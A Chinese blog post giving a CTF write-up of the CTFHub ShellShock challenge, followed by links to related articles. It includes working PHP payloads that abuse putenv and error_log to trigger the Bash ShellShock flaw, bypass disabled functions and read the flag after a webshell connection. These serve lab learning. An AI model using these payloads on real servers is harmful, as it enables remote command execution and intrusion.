CTFHub ShellShock wp(详解)

已于 2024-03-03 12:26:30 修改
阅读量961 收藏 18
点赞数 22
文章标签: 网络安全 安全 web安全
于 2024-03-03 12:25:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73195494/article/details/136420336
版权
本文介绍了ShellShock攻击原理,如何在旧版bash中利用环境变量执行代码,以及在PHP中通过`putenv`和安全模式限制下的环境变量利用方法,展示了通过上传文件和shellshock漏洞实现的文件操作和获取flag的过程。
摘要由CSDN通过智能技术生成

什么是SHellShock

个人理解:当一个环境变量以"() {"开头时,bash会将该环境变量解析为函数进行执行

什么是ShellShock攻击? (zhihu.com)icon-default.png?t=N7T8https://www.zhihu.com/tardis/zm/art/35579956?source_id=1005

 验证是否存在ShellShock漏洞(漏洞存在于bash<4.3之前的版本。)

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
//若存在漏洞时会打印vulnerable

 解题

首先还是先使用蚁剑连接,但会发现报错,最后发现是因为编码器的选择不能是default和rot13,选择其他如base64,连接成功(具体原因暂时没有找到资料,欢迎大家在评论区告知)

连接成功后,发现只能访问/var/www/html目录,其他目录无访问权限

尝试在终端执行命令,发现返回ret=127,无法执行命令

所以上传文件,借助shellshock漏洞,这里编写feng.php

查看phpinfo()时发现safe_mode_allowed_env_vars为PHP_,所以在feng.php中,环境变量的名称为PHP_自定义(可在安全模式 « PHP Manual | PHP 中文手册查看safe_mode_allowed_env_vars含义)

PHP里的某些函数(例如:mail()、imap_mail())能调用popen或其他能够派生bash子进程的函数,可以通过这些函数来触shellshock执行命令

<?php 
   putenv("PHP_hy=() { :; }; ls / >> /var/www/html/test"); 
   //这里设置环境变量时只要前缀是PHP_即可
   //利用shellshock漏洞,执行ls /命令,建立test文件,将结果保存在test中
   error_log('',1,'','');
   //查看phpinfo,发现mail函数被禁用,error_log可用,所以在这里使用error_log,在message_type设置为1的时候,使用mail()的同一个内置函数。
   echo 'ok';//便于判断是否运行成功
?>

上传文件后,在浏览器访问feng.php

在/var/www/html目录下得到test文件,在test文件中得到根目录,在根目录中发现readflag与flag文件

更改feng.php内容,改为查看readflag文件,发现readflag是一个shell文件,所以运行readflag文件

<?php 
   putenv("PHP_hy=() { :; }; cat /readflag >> /var/www/html/test"); 
   error_log('',1,'','');
   echo 'ok';
?>

得到flag

<?php 
   putenv("PHP_hy=() { :; }; /readflag >> /var/www/html/test"); 
   error_log('',1,'','');
   echo 'ok';
?>

补充:因为readflag中内容为tac /flag,所以也可以不运行readflag文件,直接访问flag文件

<?php 
   putenv("PHP_hy=() { :; }; tac /flag >> /var/www/html/test"); 
   error_log('',1,'','');
   echo 'ok';
?>

the_universe_
关注
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1377
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
ctf web方向与php学习记录30之shellshock初见()
这周末在做梦的博客
12-03 700
本次分享的内容有关shellshock。一,知识学习1 unix shell、bash、POSIX、API的学习笔记2 shellshock及相关漏洞总结一,历史二,介绍三,相关漏洞二,例题ctfhub shellshock wp 一,知识学习 1 unix shell、bash、POSIX、API的学习笔记 2 shellshock及相关漏洞总结 一,历史 一个名为Shellshock安全漏洞在2014年9月初被发现,并迅速导致互联网上的一系列攻击。这个漏洞可追溯到1989年发布的1.03版本。 二,
CTFHub ShellShock解题记录
weixin_44732566的博客
04-07 1783
CTFHub Bypass disable_function ShellShock ShellShock,破壳漏洞,出现于2014年 可以通过以下命令来判断是否存在这个漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果结果中有 vulnerable说明存在这个漏洞,执行了echo vulnerable这个语句...
【网安神器篇】——WPScan漏洞扫描工具
热门推荐
Demo不是emo的博客
10-04 1万+
​这是网安神器专栏的第一篇博客,本专栏主要是为了和大家分享平时遇见的冷门但实用的网安工具或项目,希望能帮助到同学们,今天给大家带来的是wordpress渗透神器——wpscan
第一周网安WP
xl2655894520的博客
12-05 224
1.简单的隐写 下载文件之后是一个图片,但是详情信息里面没有什么东西,于是想到可以放到010软件里查看,如果有flag,那可能就隐藏在里面,直接搜索slsec就搜到了答案。 2.海贼王里的宝藏 题目描述他不知道路飞的高度,提示也是说看一下PNG宽高。于是就想到图片的高可能被修改了,而且原图片也看起来很窄,然后把图片放到010里面修改了一下高,给他修长一点,果然结果就出来了。 3.找你妹呀! 下载文件之后是一个有密码的压缩包和一张图片,所以先看图片隐藏的信息,在详情信息里面有这真的是一张图片么,我就觉得这
shellshock
12-10
shellshock代码,网页形式,看起来不错,需要到可以试试哦。
shellshock 补丁 for rhel5.11 x64
10-08
shellshock 补丁 for rhel5.11 x64
ShellShockHunter:这是测试漏洞Shellshock的简单工具
05-05
Shellshock,也称为Bashdoor,是Unix Bash shell中的一系列安全漏洞,第一个漏洞已于2014年9月24日公开。Shellshock可能使攻击者导致Bash执行任意命令并获得对许多Internet-使用Bash处理请求的面向服务(例如Web...
shellshockcgitool:CGI脚本Shellshock开发工具
03-08
CGI脚本ShellShock开发工具。 什么是ShellshockShellshock是Bash版本1.0.3-4.3中的关键错误,可以使攻击者执行任意命令。 Bash的漏洞版本错误地执行了遵循存储在环境变量中的函数定义的命令-攻击者可以在将用户...
网安考核wp
最新发布
m0_73844510的博客
11-19 377
网安wp
网安招新wp
m0_74375241的博客
11-19 444
ctf网安招新
CTFHub Bypass disable_function系列(已完结)
feng的博客
10-14 3760
LD_PRELOAD 首先我们需要了解LD_PRELOAD这个环境变量,这里有两篇文章可以参考: 警惕UNIX下的LD_PRELOAD环境变量 利用环境变量LD_PRELOAD来绕过php%20disable_function 读完之后就会对LD_PRELOAD这个环境变量有所了解,知道了它是干什么的,但是对于如何利用还不太清楚。 利用这个环境变量的话,可以使用这些函数: putenv() error_log() mail() LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2290
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
[linux] shellshock
weixin_30845171的博客
03-07 69
1> Test if the system is vulnerable     env X="() { :;} ; echo vulnerable" /bin/sh -c "echo completed" 2> Fix it     yum update bash -y 转载于:https://www.cnblogs.com/randywithj/p/4320375.html...
CTFHub 报错注入
weixin_44732566的博客
02-20 4247
CTFHub 报错注入 当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
PWN shellshock [pwnable.kr]CTF writeup题解系列9
重新启程
01-02 711
破壳漏洞 操作过程 root@mypwn:/ctf/work/pwnable.kr# ssh shellshock@pwnable.kr -p2222 shellshock@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \| |_...
CtfHub-web-文件上传
BROTHERYY的博客
05-10 649
1.无验证 直接传,蚁剑连得flag 得到flag。 2.前端验证 这里直接把一句话的后缀改为jpg,然后再抓包修改后缀。 成功得到flag。 3.htaccess 首先编辑.htaccess文件 这里是意思以php解析含有1的文件名,然后现在上传图片 得到flag。 4.MIME验证 将修改后的包丢rapeater,send 连接后得到flag。 5.文件头检查 首先制作图片马,图片可以自己用画图工具随便画一个。 然后上传抓包,改后缀,repeater 得到flag。 6.00截断
CTFCTFHub——web
m0_52923241的博客
09-18 660
SQL 整数型注入 题目提示整数型注入,尝试输入1,有回显,输入-1 order by一直到3,没有回显,说明有两列 做题步骤: -1 union select 1,database()——sqli -1 union select 1,group_concat(schema_name) from information_schema.schemata——information_schema,performance_schema,mysql,sqli -1 union select 1,group_conc
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值